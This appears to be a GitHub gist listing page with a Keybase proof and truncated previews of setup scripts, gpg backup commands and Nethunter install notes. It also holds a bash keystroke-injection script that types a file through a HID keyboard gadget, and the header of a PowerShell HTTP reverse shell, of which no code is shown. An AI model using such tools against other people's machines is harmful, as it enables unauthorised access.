I hereby claim:
- I am jmingov on github.
- I am jmingov (https://keybase.io/jmingov) on keybase.
- I have a public key ASAxR_iU1Is4AVZAqUAAhtCEzjiWePkYXMcoTKlwODVwNAo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| #/bin/bash | |
| # | |
| # Download toolschains: | |
| # git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/arm/arm-eabi-4.7 toolchain | |
| # git clone https://android.googlesource.com/platform/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9 -b marshmallow-release toolchain64 | |
| # | |
| # Instructions to set toolchain for build: | |
| # source setupenv 64 | |
| case "$1" in |
wget https://storage.googleapis.com/golang/go1.8.1.linux-armv6l.tar.gz
sudo tar -C /usr/local -xzf go1.8.1.linux-armv6l.tar.gz
export PATH=$PATH:/usr/local/go/bin
wget https://nodejs.org/dist/v7.10.0/node-v7.10.0-linux-armv7l.tar.xz
tar -xvf node-v7.10.0-linux-armv7l.tar.xz
cd node-v7.10.0-linux-armv7l
| #!/boot/bzImage | |
| # Linux kernel userspace initialization code, translated to bash | |
| # (Minus floppy disk handling, because seriously, it's 2017.) | |
| # Not 100% accurate, but gives you a good idea of how kernel init works | |
| # GPLv2, Copyright 2017 Hector Martin <[email protected]> | |
| # Based on Linux 4.10-rc2. | |
| # Note: pretend chroot is a builtin and affects the current process | |
| # Note: kernel actually uses major/minor device numbers instead of device name |
| // TLS config, do not set InsecureSkipVerify to true in production | |
| // since it will accept all certificates | |
| config := &tls.Config{ | |
| InsecureSkipVerify: false, | |
| ServerName: host, | |
| } | |
| c, err := smtp.Dial(server) | |
| if err != nil { | |
| log.Fatal(err) |
Look at LSB init scripts for more information.
Copy to /etc/init.d:
# replace "$YOUR_SERVICE_NAME" with your service's name (whenever it's not enough obvious)Here are instructions to install Nethunter (as a ROM) with working native monitor mode in the chroot using Nexmon. The ROM is a modified CM 14.1 (nougat) base with custom kernel which supports: HID, Drivedroid, Kexec, and external wireless.
You will need the following 3 items (maybe 4):
Every so often I have to restore my gpg keys and I'm never sure how best to do it. So, I've spent some time playing around with the various ways to export/import (backup/restore) keys.
cp ~/.gnupg/pubring.gpg /path/to/backups/
cp ~/.gnupg/secring.gpg /path/to/backups/
cp ~/.gnupg/trustdb.gpg /path/to/backups/
| #!/bin/bash | |
| INPUT=$1 | |
| HIDKEY="/system/xbin/hid-keyboard" | |
| while IFS= read -r -N 1 char; do | |
| if [ "$char" == $'\n' ] || [ "$char" == $'\r' ]; then | |
| # For each new line = return key | |
| echo enter | $HIDKEY /dev/hidg0 keyboard | |
| else |
| <# | |
| Author: Casey Smith @subTee | |
| License: BSD3-Clause | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Execute Commands on Client. | |